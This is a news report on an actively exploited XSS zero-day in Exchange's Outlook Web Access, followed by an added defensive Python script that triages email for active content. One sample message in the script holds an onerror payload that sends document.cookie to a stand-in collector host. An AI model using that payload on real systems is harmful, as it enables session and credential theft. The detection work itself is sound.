
Microsoft warns of active exploitation of new Exchange Server zero-day vulnerability


As reported by Security Affairs, Microsoft has issued a warning that a zero-day vulnerability in Microsoft Exchange Server, tracked as CVE-2026-42897, is being actively exploited.

The vulnerability is a cross-site scripting (XSS) flaw with a CVSS score of 8.1 that specifically affects Outlook Web Access (OWA). An attacker exploits it by sending a specially crafted email; when the message is opened in OWA under certain conditions, attacker-controlled JavaScript runs in the victim's browser session. Microsoft classifies the impact as spoofing over the network, and in practice code running inside a user's webmail session gives the attacker a direct path into an organization's internal communications, credentials, and business workflows. Microsoft confirmed exploitation in the wild but has not detailed the attacks. A permanent fix is still pending; temporary mitigation measures have been released, and administrators are urged to apply them immediately.

The exploitation of Exchange Server zero-days is particularly dangerous due to the central role of email systems in organizations and the frequent internet-facing nature of many Exchange servers. This flaw surfaced shortly after Microsoft's May 2026 Patch Tuesday, which addressed 138 vulnerabilities.
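The article describes the attack vector (a crafted email whose HTML is rendered by OWA) but, like Microsoft's advisory, does not publish the payload. The following script is an added example, not code from the article, Security Affairs, or Microsoft, and it is not a signature for CVE-2026-42897. It shows the kind of mail-queue triage a responder might run while the vendor mitigation is pending: parse raw RFC 5322 messages, pull out every text/html part, and count markers of active content (script tags, inline event handlers, javascript: URIs, embedded SVG/object/iframe, data:text/html URIs) that a webmail sanitizer is supposed to strip. The two sample messages, the pattern set and the hostnames are constructed for the example.

```python
# Added example (not from the article or Microsoft): heuristic triage of HTML
# email parts for active content that should never reach a webmail renderer.
import email
import re
from email import policy
from email.message import EmailMessage

# Markers commonly associated with script execution in HTML mail. This is a
# hunting heuristic, not a detection rule for the Exchange/OWA CVE above.
ACTIVE_CONTENT_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"(?:href|src|action)\s*=\s*[\"']?\s*javascript:", re.I),
    "svg_or_object": re.compile(r"<\s*(?:svg|object|embed|iframe)\b", re.I),
    "data_uri_html": re.compile(r"data:\s*text/html", re.I),
}


def html_parts(msg: EmailMessage):
    """Yield decoded text/html bodies, walking multipart trees (alternative, mixed, ...)."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def scan_message(raw: bytes) -> dict:
    """Return {pattern_name: hit_count} over all HTML parts of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = {name: 0 for name in ACTIVE_CONTENT_PATTERNS}
    for body in html_parts(msg):
        for name, pattern in ACTIVE_CONTENT_PATTERNS.items():
            hits[name] += len(pattern.findall(body))
    return hits


def is_suspicious(hits: dict) -> bool:
    """Any active-content marker in an HTML mail part is worth a human look."""
    return any(hits.values())


# Constructed sample messages (not real captures): a plain HTML newsletter and a
# message carrying an inline event handler and a javascript: link.
BENIGN = b"""From: news@example.test
To: user@example.test
Subject: Weekly update
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Hello, see the <a href="https://example.test/report">report</a>.</p></body></html>
"""

SUSPICIOUS = b"""From: attacker@example.test
To: user@example.test
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please see the attached invoice.
--b1
Content-Type: text/html; charset="utf-8"

<html><body><img src="x" onerror="fetch('https://collector.example.test/?c='+document.cookie)">
<a href="javascript:alert(1)">open</a></body></html>
--b1--
"""

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        hits = scan_message(raw)
        print(label, "suspicious" if is_suspicious(hits) else "clean", hits)
```

Expect false positives from legitimate marketing mail that uses event handlers or embedded SVG, so treat a hit as a triage queue entry rather than a verdict. The heuristic also says nothing about the "certain conditions" the article mentions; the actual protection is the vendor mitigation and, once available, the patch.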

Source: Security Affairs
